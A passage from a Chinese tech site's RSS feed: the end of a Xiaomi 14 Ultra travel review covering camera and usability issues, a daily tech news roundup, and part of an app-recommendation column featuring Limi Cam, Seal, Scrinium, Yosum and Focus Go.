广角镜头的畸变更是惨不忍睹，我甚至找了半天都没能找到一个样张。我不确定是不是受限于硬件大小，所有手机的广角头都是这样，但实际上这确实让它的可用性大打折扣。</p><p>其次，因为这次 3.2x 镜头的光圈给得足够大，IMX858 的性能也足够好，或许还有这次整体影调偏低调的缘故，这一切都导致夜景的拍摄中大底主摄不是必需品。很多时候只要光线没有暗到一定程度，3.2x 镜头的拍摄效果一样很好，例如下面的这张照片。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/14/850a83ccac67974d8ae3b132c93e33a3.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>3.2x 镜头的暗光效果，在 400 的 ISO 下快门可以压低到 1/120s</figcaption></figure><p>作为一个对比，5x 镜头就远没有那么优秀。例如下面这张照片的自动快门速度就来到了 1/8s，从而导致整张照片都拍糊了。如果 3.2x 镜头也是这个进光量，恐怕夜景就只能靠主摄了，这个长焦大光圈可能也是 14 Ultra 相比 14 为数不多的显著优势吧。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/14/67068f995c8cee83c97cb103698982f2.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>5x 镜头的暗光效果明显差很多，快门速度达到了 1/8s</figcaption></figure><h3>过慢的快门速度</h3><p>再回到上面这张照片。仔细看一下水印中的参数就会发现，这张照片暴露了小米 14 Ultra 反复出现的一个问题：不知道是不是因为高感的效果实在不好，当感光度来到 1000 左右的时候，手机的算法宁可拉长曝光时间，也不愿意再提高一些感光度。</p><p>有过一定经验的拍摄者都知道，在手持的情况下，与其为了减少噪点降低 ISO 延长快门速度，还不如降低快门速度到安全范围内，然后拉高 ISO。毕竟无论什么时候，拍到都比拍好更重要，而一张糊了的图片是完全不能用的，也就等同于没有拍到。</p><p>如果以后有机会，我可能会开专业模式尝试一下暗光下高感的效果，看看这只是相机参数策略的失误，还是真的有其必然原因。</p><h2>其它细节使用体验</h2><p>除了上述摄影方面的体验之外，我也尝试记录了这段时间的一些其它使用体验。</p><p>其中某些众所周知的问题，例如防抖系统的晃动噪声问题已经在上文中提过了，这里就不再赘述。</p><h3>摔！狠狠地摔！</h3><p>手机在旅行中总是免不了一些磕磕碰碰。无论是因为放进口袋的时候放歪了，还是抬手的时候碰到了旁边的人，总之我的手机在这两周的旅程中从差不多胸部到腰部的高度跌落了三四次。</p><p>不过就像大部分跌落测试中展现的那样（而且我的手机并不是裸奔，还有手机壳和原厂膜的保护），无论是屏幕还是镜头，在这几次跌落中都没有任何的损伤。想起当时被我随随便便摔碎屏幕的小米 10 系列，只能说曲面屏除了帅以外没有任何优势，微曲才是正解啊！</p><p>可惜的是，这几次跌落导致我的原厂屏幕膜有一些挫伤和气泡，同时原厂的透明手机壳也产生了一点裂纹。这几天可能就要换新的贴膜和手机壳了，但是我并没有接到广告 :P</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/15/6610ff73fc52cc384e118d15f04f25a8.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>被摔坏的手机壳，顺便展示这次长焦镜头的微距和虚化效果</figcaption></figure><h3>品控，又是品控</h3><p>除了手柄之外，手机上我也遇到了一点疑似品控问题的小问题。</p><p>这次小米 14 Ultra 的音量和电源按键手感是相当不错的，按下的时候有非常明显「咔哒」的段落感。</p><p>但是在我来到日本的第二天，我的电源按钮按下时突然变成了很肉的手感，这时我甚至还没有摔过这台手机。</p><p>上一次遇到类似的问题是在飞智的黑武士 3 手柄上，这款手柄的 START 按键也出现了失去段落感的问题。我怀疑可能是内部的硅胶从某个特殊的角度卡住了，但是也并不知道怎么解决。</p><p>幸运的是，在即将离开日本的时候，这台手机的电源按钮突然自己恢复正常了。虽然后续还是会非常偶然地出现一些奇怪的手感变化，比如能感觉到按下的时候有一个左右的位移，不过也算是基本可用了。不然这种小问题，真是让人觉得送修不值得，不修恶心人，令人进退不得。</p><h3>照片后期编辑的问题</h3><p>因为我现在的拍照基本都是使用普通模式的 JPEG 直出，所以导入到 Lightroom 做后期就显得不是那么必要了。同时小米的相册 app 也提供了足够好的编辑功能，基本上可以满足绝大部分后期编辑的需求。</p><p>只不过在使用的过程中，我还是遇到了一些软件交互设计上不太舒服的地方。</p><p>首当其冲的问题是，对于一张照片，在进行了一次编辑后，会以编辑时间作为文件名保存一个新文件。虽然相册中似乎是按照拍摄时间排序的，所以依旧会看到编辑后的照片和拍摄时的照片排列在一起，但拷贝到 NAS 或者电脑硬盘之后，就很难根据文件名区分哪张照片是由哪张照片编辑得到的了。而且编辑后的照片并不会有特殊的文件名，看起来就像直接拍摄的照片一样，这真的很诡异。</p><p>其次也是一个编辑后保存的问题。通常在编辑一张直接拍摄的<strong>带水印的</strong>照片时，小米的相册 app 会自动移除水印部分，把照片本身展示在界面中编辑，并在编辑后根据设置重新加上水印。可此时如果希望再次编辑这张带水印的<strong>编辑后的</strong>照片，就会发现水印也成为了照片的一部分被编辑，所有裁剪、调整亮度、调整颜色的功能，也都会作用在水印上。此时，就只能手动裁剪掉水印部分，或者重新编辑原始照片来解决，但无论哪种方法都很麻烦。</p><p>例如下面这张图，左侧是编辑一张原始图片时裁切旋转的操作界面，而右侧是先提高了原图的对比度之后保存一次，在编辑这张保存后的图片时裁切旋转的界面。无论是编辑前还是编辑后的图片，本身都是添加了水印的。但是编辑前的图片在裁切旋转界面中就能够自动移除水印部分，而编辑后的图片则会带着水印一起被裁切。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/e1bc0057b7149e0f32388365a9537e71.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>初次编辑和二次编辑的区别，感谢好友的狗子友情出镜</figcaption></figure><p>再接下来还是一个水印相关的问题。简单来说，拍摄时生成的水印与二次编辑后的水印，字体和间距是不完全一致的。我也不知道怎么解释这个问题……</p><p>最后，我还比较偶然地遇到了几次定位不准确的问题。我在京都、神户等地区拍摄的一系列照片中，竟然混入了几张定位是东京的照片——然而我的这次旅行目的地是日本关西，根本就没有去过东京。</p><p>这些大大小小的问题看似都不那么关键，我也不确定小米什么时候能在系统更新中修复它们。希望有朝一日这些问题真的能被解决吧。</p><h2>其它杂七杂八的体验</h2><p>除了上述摄影相关的体验以外，还有一些不知道该归到什么类别中，和摄影没有直接关系的体验，就统一写到文章的最后吧。</p><h3>无线充电支架</h3><p>我是在小米之家线下购买这台手机的，所以拿到了一张几百元的优惠券，可以用于购买店内任何小米产品。</p><p>思考了一下之后，我决定购买了和手机同时上市的新款无线快充支架。</p><p>不得不说，这款支架还是给了我一些惊喜的。我一直以来都有在电脑上使用 <a href="https://github.com/beancount/beancount">Beancount</a> 记账的习惯，之前我都是用 MIUI+ 投屏到电脑上对账的。但是偶尔的高延迟加上很多场景无法呼出输入法，以及一些需要指纹识别和禁止投屏的场景（财务相关的软件尤其多），还是会带来很多不便，让我不得不频繁抓起手机。</p><p>但是有了这款支架以后，配合新系统的眼部追踪功能，几乎可以在我记账的过程中全程维持只要我看向手机，手机屏幕就会自动点亮。同时，支架的角度也很适合不取下的情况下输入一些简单的文字，或者进行一些简单的点击和翻页操作。</p><p>不过考虑到场景受限，以及这款无线充电支架本身的价格，我并不推荐任何人在没有需求和没有优惠的情况下购买它。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/15/8328ac5ca088d6b10a418195b232a0d8.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>手边的充电支架和屏幕上显示的 MIUI+，请忽略略显凌乱的桌面</figcaption></figure><h3>MIUI+</h3><p>前面既然提到了 MIUI+，也顺便提一下小米 14 Ultra 在 MIUI+ 上的体验。</p><p>小米迟迟不肯将 MIUI+ 开放给小米笔记本外的 PC 系统，一直是受人诟病的一个问题。好在还是有一些方法搞到 MIUI+ 安装包的，所以我也一直用着它的投屏功能。</p><p>但是从 12 Pro 更换为 14 Ultra 之后，之前的 MIUI+ 突然就不能使用了，连接时手机上会提示「当前电脑应用版本过低」。这个情况一直持续到我去日本旅游，我也是对它毫无办法。</p><p>好在旅游回来之后，我打开电脑就发现 MIUI+ 应用内推送了新版本更新。升级了新版本之后，虽然扫码连接的时候还是会有上述报错，但手机上是可以成功弹出连接提示的，且确认连接之后所有的功能都能够正常使用。</p><p>唯一还存在的问题是，如果从电脑端 MIUI+ 上选择在线的手机主动连接，手机上无法正常弹出提示。也就是说，每次连接都需要使用手机重新扫描电脑上的二维码才可以。但是这都是小问题了，能用比什么都好。</p><p>希望有朝一日，小米可以把这个好用的多端互联功能公开出来，下放到所有品牌的 Windows PC 上吧。</p><p style="margin-left: 0px;">&gt; 关注&nbsp;<a href="https://sspai.com/link?target=https%3A%2F%2Fwww.xiaohongshu.com%2Fuser%2Fprofile%2F63f5d65d000000001001d8d4" target="_blank">少数派小红书</a>，感受精彩数字生活 🍃</p><p style="margin-left: 0px;">&gt; 实用、好用的&nbsp;<a href="https://sspai.com/mall">正版软件</a>，少数派为你呈现 🚀</p>
                ]]>
            </content:encoded>
        </item>
        
        <item>
            <id>https://sspai.com/post/88102</id>
            <title>派早报：第一季度全球智能机出货量上涨 7.8%，OpenAI 开设日本分部等</title>
            <link>https://sspai.com/post/88102</link>
            <guid isPermaLink="false">https://sspai.com/post/88102</guid>
            <pubDate></pubDate>
            <updated>Tue, 16 Apr 2024 00:54:09 GMT</updated>
                
                
            <content:encoded>
                <![CDATA[
                    
                        <div> 关键词: 全球智能机出货量, OpenAI, Blackmagic Design, Apple
<br>
<br>
总结: 4 月份全球智能手机出货量增长，三星超越苹果成为第一；OpenAI在日本开设分部，推出为日本市场定制的AI工具；Blackmagic Design发布适用于iPad的调色面板；Apple因垃圾广告和版权问题下架GameBoy模拟器iGBA。 </div>
                        <hr>
                    
                    <h2>你可能错过的新鲜事</h2><h3>第一季度全球智能机出货量上涨 7.8%</h3><p>4 月 15 日，国际数据公司 IDC 发布文章，根据初步数据，2024 年第一季度全球智能机出货量同比增长 7.8%，达 2.894 亿部。这是连续第三个季度的出货量增长。品牌方面，三星重回品牌出货量的首位，将 Apple 送回第二。小米、传音、OPPO/一加等分列三至五名，文中还提到 vivo 与华为也有显著增长。<a href="https://www.idc.com/getdoc.jsp?containerId=prUS52032524">来源</a></p><figure class="image ss-img-wrapper"><img alt="TNf1bK4BcowBj2xur4UcSzKznbc" src="https://cdn.sspai.com/editor/u_/coesmrtb34te0f7ualv0.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><h3>OpenAI 开设日本分部</h3><p>4 月 14 日，OpenAI 发布博文，宣布开设日本东京工作室，进军亚洲市场。博文中称，OpenAI 将致力于与日本政府、当地企业、研究机构等合作，开发符合日本独特需求的安全的 AI 工具。OpenAI 将为日本市场推出为日语优化的定制 GPT-4 模型，速度可达之前模型的 3 倍。以英语学习应用 Speak 为例，在新模型下，指导内容的生成速度快了 2.8 倍，使用的 token 量减少了 47%。<a href="https://openai.com/blog/introducing-openai-japan">来源</a></p><h3><strong>Blackmagic Design 发布适用于 iPad 的达芬奇调色面板</strong></h3><figure class="image ss-img-wrapper"><img alt="DYlKb6jetoOhlMxbx0YcZj90ncg" src="https://cdn.sspai.com/editor/u_/coesms5b34te0b9k27o0.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>Blackmagic Design 公司于 4 月 15 日发布了专为 iPad 打造的调色面板硬件 DaVinci Resolve Micro Color Panel，该硬件大小约为 36.4cm × 18.2cm，拥有 iPad Pro 的卡槽位，可通过蓝牙或 USB-C 接口连接；面板上有三个配重轨迹球以及 12 个控制旋钮，用于调节阴影、高光、对比度和中间色调等参数。左右两侧还包含了一些擦除静态画面、光标和选择等功能键，并且为了为了让剪辑师们使用起来更熟悉，Micro 的大部分按键放在了与大型面板相同的位置。该面板定价为 495 美元，将于 5 月在全球上市。<a href="https://www.theverge.com/2024/4/14/24130227/blackmagic-design-davinci-resolve-micro-color-panel-ipad-pro">来源</a></p><h3>Apple 因垃圾广告和版权侵害下架 GameBoy 模拟器 iGBA</h3><p>Apple 于 4 月 14 日从 App Store 下架了近期刚刚上架的 GameBoy 模拟器 iGBA，原因是该应用违反了 App 审核指南的垃圾内容（第 4.3 节）和版权（第 5.2 节）相关规定。实际上该应用就是开源应用 GBA4iOS 的山寨版本，通过允许用户免费下载 ROM 来玩 Game Boy 游戏，但应用内部包含大量的垃圾广告。虽然在发布后该应用迅速蹿升至 App Store 排行榜前列，但社交媒体上充斥着用户对该应用的大量负面评价。<a href="https://www.macrumors.com/2024/04/15/apple-removes-igba-from-app-store/">来源</a></p><h3>Square Enix 发布《最终幻想 14：黄金的遗产》基准测试工具</h3><p>4 月 14 日，Square Enix 发布《最终幻想 14：黄金的遗产》基准测试工具。工具中包括地图、可玩角色与包含女性新种族的角色创建工具，支持 4K 与 5.1 声道环绕声，玩家可以测试运行情况与人物显示状况，测试后工具会给出运行评分。游戏将于 7 月 2 日上线。<a href="https://na.finalfantasyxiv.com/benchmark/">来源</a></p><figure class="image ss-img-wrapper"><img alt="KdwWbbTlNo7KMtxuVoMc1U35ngc" src="https://cdn.sspai.com/editor/u_/coesmsdb34te092f68dg.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><h3>工信部：大力发展基于大模型的智能装备、软件等智能产品</h3><p>据工业和信息化部官网消息，在 4 月 11 日召开的人工智能赋能新型工业化企业座谈会暨第八次制造业企业座谈会上，工业和信息化部党组书记、部长金壮龙在会上表示，要大力发展基于大模型的智能装备、软件等智能产品。同时要充分发挥我国完备产业体系和新型信息基础设施优势，从供给侧、需求侧、基础侧协同发力，加快培育面向工业领域的大模型，凝练和开放工业应用场景，深化工业数据开发利用，提升算力供给能力，着力营造良好环境，积极探索人工智能和工业融合发展新路径，形成双向赋能的发展格局。会中来自人工智能技术供给侧、智能化转型需求侧的 11 家企业负责人互相交流发言，介绍了底层核心技术研发、工业应用场景开拓、产业生态构建等方面的创新实践，并提出针对性意见建议。<a href="http://finance.people.com.cn/n1/2024/0411/c1004-40214287.html">来源</a></p><h2>看看就行的小道消息</h2><ul><li>Android Authority 从 Google 内部人士处获悉，今年发布的 Pixel 9 系列机型将采用三星的 Exynos 5400 5G 调制解调器，相比之前的基带芯片性能更好同时功耗更低。另外该基带芯片支持 3GPP Release 17，该版本允许使用 5G 非地面网络（NTN），即支持卫星通信功能，同时 Google 正在为 Pixel 手机提供「卫星求救」功能，允许用户通过卫星通信的方式来和紧急服务进行联系。<a href="https://www.androidauthority.com/pixel-9-sos-satellite-connectivity-3433498/">来源</a></li><li>爆料人 evleaks 发现 UScellular 错误地提前发布了 Pixel 8a 的设备支持页面，页面现已下架。页面图例确认 Pixel 8a 有 a 系列一脉相承的粗边框，前置摄像头挖孔位于顶部正中。这可能提示 Pixel 8a 会早于 Google I/O 发布。<a href="https://www.androidauthority.com/google-pixel-8a-us-cellular-support-page-spotting-3434025/">来源</a></li><li>华为于 4 月 15 日宣布 P 系列将升级为 Pura 系列，并公布 Pura70 系列手机。目前官网仍未更新 Pura 系列，也未上架或正式发布该系列相关参数。<a href="https://weibo.com/huaweidevice">来源</a></li></ul><h2>少数派的近期动态</h2><ul><li>由用户提供产品创意、由少数派实现孵化落地的快捷指令手机壳 BANG!CASE，已顺利完成超前预售。现在起到 5 月 6 日正式发售前，仍可以 199 元（原价 259 元）的优惠价格购买，并获得 3 个月少数派会员、站内特制徽章等权益。我们还于近日上线了 BANG!CASE 专题页，除详尽介绍产品功能外，还提供专为 BANG!CASE 打造的壁纸下载，欢迎浏览了解。<a href="https://sspai.com/page/bangcase"><strong>前往专题页</strong></a></li></ul><figure class="image ss-img-wrapper"><img alt="Di5wbiYnKopYMQxFLk1cKzpgnag" src="https://cdn.sspai.com/editor/u_/coesmslb34te0b9k27og.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><ul><li>少数派渠道开启「赛博复古」季，我们为你准备了 3 条视频、1 篇文章，还有一场线下活动。请关注 <a href="https://weibo.com/u/1914010467">少数派微博</a>、<a href="https://www.xiaohongshu.com/user/profile/63f5d65d000000001001d8d4">小红书</a> 了解更多详情。</li></ul><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/0e7d61df455d8055fbdb90902e0c3eec.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><ul><li>少数派将联合飞傲和广州四家独立唱片店 Portal、Soulless Tune、臻音堂和 Disc Joker 举办 2024 年度「国际唱片日 Record Store Day」活动。时间为 4 月 19 ~ 21 日，届时现场将有唱片折扣、飞傲磁带机 CP13 优惠套装、线下演出等等，还有店主们特别录制、制作的限量磁带可以通过打卡或消费获得。对唱片文化感兴趣的朋友可以在公众号、小红书搜索店铺关键字关注对应的帐号，也可以关注 <a href="https://weibo.com/u/1914010467">少数派微博</a>、<a href="https://www.xiaohongshu.com/user/profile/63f5d65d000000001001d8d4">小红书</a> 了解更多后续信息。</li></ul><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/da1749e4fbcbace4e80494b87808f198.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><h2>你可能错过的文章</h2><ul><li><a href="https://sspai.com/post/87950">App+1 | 功能强大的录屏与编辑工具，而且免费：Screenity</a></li><li><a href="https://sspai.com/post/87791">城市漫步指南：初见山西，记住大同</a></li><li><a href="https://sspai.com/post/88086">派评 | 近期值得关注的 App</a></li></ul><p>&gt; 下载 <a href="https://sspai.com/page/client">少数派 2.0 客户端</a>、关注 <a href="https://sspai.com/s/J71e">少数派公众号</a>，解锁全新阅读体验 📰</p><p>&gt; 实用、好用的 <a href="https://sspai.com/mall">正版软件</a>，少数派为你呈现 🚀</p>
                ]]>
            </content:encoded>
        </item>
        
        <item>
            <id>https://sspai.com/post/88086</id>
            <title>派评 | 近期值得关注的 App</title>
            <link>https://sspai.com/post/88086</link>
            <guid isPermaLink="false">https://sspai.com/post/88086</guid>
            <pubDate></pubDate>
            <updated>Mon, 15 Apr 2024 10:18:29 GMT</updated>
                
                
            <content:encoded>
                <![CDATA[
                    
                        <div> 关键词: 手机摄影, 胶片模拟, Limi Cam, 视频下载
<br>
<br>
总结: 本文介绍了一款名为Limi Cam的手机摄影App，该App提供了多种胶片模拟滤镜和简单的拍摄设置，帮助用户轻松拍摄出高质量的照片。另外还介绍了另一款名为Seal的视频下载工具，支持多种文件下载格式和兼容性设置，方便用户保存自己喜欢的视频内容。 </div>
                        <hr>
                    
                    <p>欢迎收看本期《派评》。你可以通过文章目录快速跳转到你感兴趣的内容。如果发现了其它感兴趣的 App 或者关注的话题，也欢迎在评论区和我们进行讨论。</p><h2>值得关注的新 App</h2><p>虽然少数派一直在为大家发现和介绍各平台上的优质 App，但仍有不少设计、功能、交互、体验都非常优秀的 App，还没有被我们发掘和介绍。它们可能是一款老 App，也可能是近期上架的新 App，我们会在这里介绍给你。</p><h3>Limi Cam：高度还原胶片模拟，边框颗粒一键搞定</h3><ul><li>平台：iOS / iPadOS</li><li>关键词：手机摄影、胶片模拟</li></ul><p><a class="ss-atUser" href="https://sspai.com/u/whoops">@Vanilla</a>：Limi Cam 其实脱胎于开发者的前一款专业摄影应用：方弗相机，Tolecen 将方弗相机中的胶片模拟滤镜和画框、画幅、美颜等功能拿出来单独做了一款功能更垂直的手机模拟胶片 App，希望可以通过更简单的上手门槛和更低的售价打动普通的手机摄影爱好者们。</p><p>首先是大家最关心的胶片模拟部分。目前，Limi Cam 提供了合计 25 款胶片模拟滤镜，其中包括了经典的富士负片、柯达金、哈苏自然色彩等。</p><figure class="image ss-img-wrapper"><img alt="Etr8bfWPzo3e2mxhQSMcqjRRnX4" src="https://cdn.sspai.com/editor/u_/coefb8db34te092f66n0.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>如果你对每个胶片模拟效果适合什么样场景或者风格的照片没有把握，那么只需点击胶片切换区域的右上角 i 按钮即可进入胶片简介界面，在此处开发者为大家详细地介绍了每款胶片模拟滤镜的灵感来源以及适合的拍摄场景。</p><figure class="image ss-img-wrapper"><img alt="Edo6bDQKYocL22x9rjMcz7GDnGd" src="https://cdn.sspai.com/editor/u_/coefb8lb34te05l6r890.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>除了胶片模拟滤镜，Limi Cam 还提供了一些简单的拍摄设置，比如说曝光、颗粒强度、闪光灯和白平衡，仅此而已。曝光和白平衡设置都采用了滑条调节的方式，滑动的过程中都可以通过取景窗口实时预览画面效果，点击滑轨右上方的「0 EV」和「自动」按钮即可复原。</p><figure class="image ss-img-wrapper"><img alt="AUb5bRASnoucGGxygvicPiuRnpc" src="https://cdn.sspai.com/editor/u_/coefb9db34te0b9k25ng.gif" /></figure><p>Limi Cam 中对颗粒强度的设置对新手也非常友好。为照片增加颗粒可以让胶片模拟看起来更加真实，不过普通的摄影爱好者很难把握颗粒强度，多了或者少了都会起到不好的效果。在 Limi Cam 中，颗粒强度的设置只有关闭、颗粒弱、颗粒强这三种选项，方便大家非常直观地进行对比和选择。</p><figure class="image ss-img-wrapper"><img alt="DHQWb75OJoMHmjxvZSfcHunDnmg" src="https://cdn.sspai.com/editor/u_/coefbadb34te0b9k25o0.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>在最新版本中，Limi Cam 还支持了从系统相册中导入图片。导入后，我们就可以选择胶片模拟滤镜和边框，并进行实时预览，满意后可以再保存到系统相册中。</p><figure class="image ss-img-wrapper"><img alt="XW1obgtbMo99cSxJvf4cIvxsnWg" src="https://cdn.sspai.com/editor/u_/coefbalb34te092f66ng.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>你可以在少数派购买 <a href="https://sspai.com/item/415">Limi Cam</a>，售价 30 元。</p><span class="ss-genuineSoftware" type="genuinesoftware">&nbsp;</span><h3>Seal：美观易用的视频下载工具</h3><ul><li>平台：Android</li><li>关键词：视频下载</li></ul><p><a class="ss-atUser" href="https://sspai.com/u/69zxdqx8">@Noah_Choi</a>：我有一个习惯，就是每次看到或有趣或实用的视频，我都想要保存在本地才放心，因为即使放到了「收藏夹」中，也很有可能突然被删除或下架。不过很多网站都比较封闭，不提供通用下载的途径，所以就会用到专门的视频嗅探和下载工具，比如这款 Seal。</p><p>Seal 采用了 Material You 设计，并且支持动态取色功能，下载视频的操作也非常傻瓜，只需要复制并粘贴视频链接，Seal 就能嗅探出视频文件。Seal 提供了多种文件下载格式和兼容性的设置项，比如保存成音频格式、下载质量、同时下载字幕等，甚至还支持简易的视频剪辑功能。</p><figure class="image ss-img-wrapper"><img alt="KnrybvcjVovzRlxX4Lnc7cr0n3g" src="https://cdn.sspai.com/editor/u_/coefbb5b34te0b9k25og.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>Seal 实际上是使用了 yt-dlp 下载器，所以也可以看作是一个 GUI 封装项目，理论上任何 yt-dlp 支持的功能，Seal 都能够实现，比如 SponsorBlock 片段识别和移除、字幕格式排序、视频缩略图控制等等。而对于那些没有 GUI 入口的功能，Seal 也支持直接调用命令行，具体的实现方式可以查看 yt-dlp 使用手册。除此之外，在 Seal 设置中还可以直接热更新 yt-dlp 开发版本，以便获取最新的功能支持。</p><figure class="image ss-img-wrapper"><img alt="PZr6buFhkojZ6ExTPiXcEriWnNh" src="https://cdn.sspai.com/editor/u_/coefbbdb34te092f66o0.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>如果你正巧有着使用手机下载视频的需求，不妨尝试一下 Seal。应用开源免费，你可以在 <a href="https://f-droid.org/en/packages/com.junkfood.seal/">F-Droid</a>、<a href="https://github.com/JunkFood02/Seal">GitHub</a> 下载安装。</p><h3><strong>Scrinium：多读书，也要记得追踪阅读进度</strong></h3><ul><li>平台：Android</li><li>关键词：读书记录、阅读追踪</li></ul><p><a class="ss-atUser" href="https://sspai.com/u/5isr02uh">@Peggy_</a>：「阅读是一座随身携带的避难所」，阅读也成为了许多人追求内心平和的一种途径，随着我们不断地阅读，阅读进度的统计和阅读习惯的坚持都需要借助一定的外力来帮助。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/15/article/e56470043536bd95e4aadb3ea77866c0.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>Scrinium 是 Android 平台一款帮助开展阅读进度追踪和阅读习惯培养的应用。初次打开应用，我们需要在主页设置自己的日计划或月计划，计划可以从每日阅读页数、阅读分钟数和阅读本书等方面开展。设置好相应的计划后，我们可以添加近期在阅读的一些书籍信息，应用支持记录书籍封面、书名、作者页数等信息。如果你是一个有声书爱好者，还能解锁应用高级版来添加有声书。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/15/article/4fe209b732ee41e0d560bcab6011790b.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>添加好书籍信息后，我们就可以开始进行阅读追踪了，点击进入相应的书籍后，我们可以通过开启内置的计时器来记录当日的阅读时长，或是直接手动输入相应的阅读进度，例如页码范围或是百分比等。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/15/article/e53242a658a71b7a55db9430a3b68d9c.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>随着我们记录的内容不断完善，Scrinium 会生成属于我们的阅读统计结果，统计结果既可以针对单本书呈现，也可以生成我们整体的阅读情况。</p><figure class="image ss-img-wrapper image_resized" style="width: 349px;"><img src="https://cdn.sspai.com/2024/04/15/article/49a21d84e6606e31f83a41a2b9069140.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>如果有需要的话我们还能在应用内进行书籍内容的摘录，或是即时撰写书评。尽管当下大部分在线阅读应用都能做到这一点，但是对于纸质书籍爱好者而言，Scrinium 这样的应用仍然有存在的必要。</p><p>你可以通过 <a href="https://play.google.com/store/apps/details?id=com.gmail.sekovchuk.scrinium">Play Store</a> 下载体验 Scrinium，应用本体免费，有声书统计等高级功能需付费订阅。</p><h3>Yosum：拯救我杂乱的订阅计划</h3><ul><li>平台：iOS / iPadOS</li><li>关键词：订阅管理</li></ul><p><a class="ss-atUser" href="https://sspai.com/u/robinpeng">@ROB1N</a>：不知道其他读者是什么习惯，我的生活目前是离不开流媒体的：上班路上听 Spotify 、下班路上听 Pocket Cast 、回到家吃饭看 Netflix ，周末还要在哔哩哔哩固定追番；不想出门运动还要打开 Apple TV 跟着  Finess+ 做一做运动，然后看看 Apple TV+ ；偶尔还会刷一下 YouTube 看一看我喜欢的 YouTuber 的更新……</p><p>总之我生活的各个环节基本上都被流媒体占领了。但是相信各位也知道，这些流媒体也是需要付费订阅的，只是这些订阅并不是统一时间付费，面对这么多订阅项目，Yosum 作为一款订阅管理软件，帮我解决了当下的重要问题：哪项服务需要付款了？需要付多少钱？</p><p>应用首页可以添加自己的订阅，同时顶部会计算所有订阅每个月的均价是多少，同时也可以分类查看，只要选中相应的列表就可以。在设置中我们可以选择预设的币种，同时在编辑订阅的时候也可以选择币种，方便在不同币种的续费间来回切换。</p><figure class="image ss-img-wrapper"><img alt="DCrAbQc4yoOGovxHdI0cNLBznZd" src="https://cdn.sspai.com/editor/u_/coefbblb34te0b9k25p0.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>订阅的编辑也非常简单，可以设置金额、上次付费时间以及付费周期，可以满足大部分的订阅需求。不过有一点不方便在于，订阅周期目前只有「每周」「每月」「每年」，但是很多订阅是按照季度来的，所以希望可以在后续的更新中加上「每季」这一选项。</p><figure class="image ss-img-wrapper"><img alt="KBLnb0LNso7CmWxkEbOcYLSNnGe" src="https://cdn.sspai.com/editor/u_/coefbbtb34te0f7uak6g.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>目前 Yosum 提供年度 Premium 订阅，订阅价格 ¥58 ，Premium 订阅支持无限制新增订阅项目，还可以管理其他家庭成员的订阅等等，大家可以在<a href="https://apps.apple.com/us/app/yosum-subscription-manager/id6451242119?l=zh-Hans-CN">这里</a>下载体验。</p><span class="ss-application">&nbsp;</span><h3>Focus Go：轻量又实用的图库工具</h3><ul><li>平台：Android</li><li>关键词：图库</li></ul><p><a class="ss-atUser" href="https://sspai.com/u/69zxdqx8">@Noah_Choi</a>：图库 App 就像「拨号」这个功能一样，大家都习以为常，并没有分给它太多注意力。不过在这个「社交为王」的互联网时代，手机厂商和各个互联网大厂却总是想让图库增加更多功能，我甚至一度以为马上会有一个搭载全功能 PhotoShop 的图库 App 问世了。不过也有开发者认为，图库就应该是图库，其他功能应该交给更加专业的 App 才对，比如开发大牛 Francisco Franco，它就开发了这款名为「Focus Go」的轻量化图库 App。</p><p>Focus Go 功能非常精简，甚至还没有「相册」功能，打开应用就直接把所有图片展示出来。在设置中，我们可以调整缩率图排列方式，如果你的手机比较新，性能还不错的话，可以打开「高质量缩略图」选项，Focus Go 会采用 32 位图片解码器，你能够获得更高质量的预览效果。</p><figure class="image ss-img-wrapper"><img alt="EU5LbsVMpoEknWxj7TkcoAqInsd" src="https://cdn.sspai.com/editor/u_/coefbc5b34te0f7uak70.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>Focus Go 支持 HDR 图片渲染，不过同样需要在设置中打开。开启后就能够在图片详情中看到更加明显的明暗效果优化。在该页面当中，你可以点击右上角的编辑按钮，Focus Go 会弹出编辑器选择窗口，你可以随意选择喜欢的编辑器。这便是开发者认为的「专业的事情交给专业的 App 来做」。</p><figure class="image ss-img-wrapper"><img alt="Jgy4b9TbCobbm1xITx4cPYQmnJe" 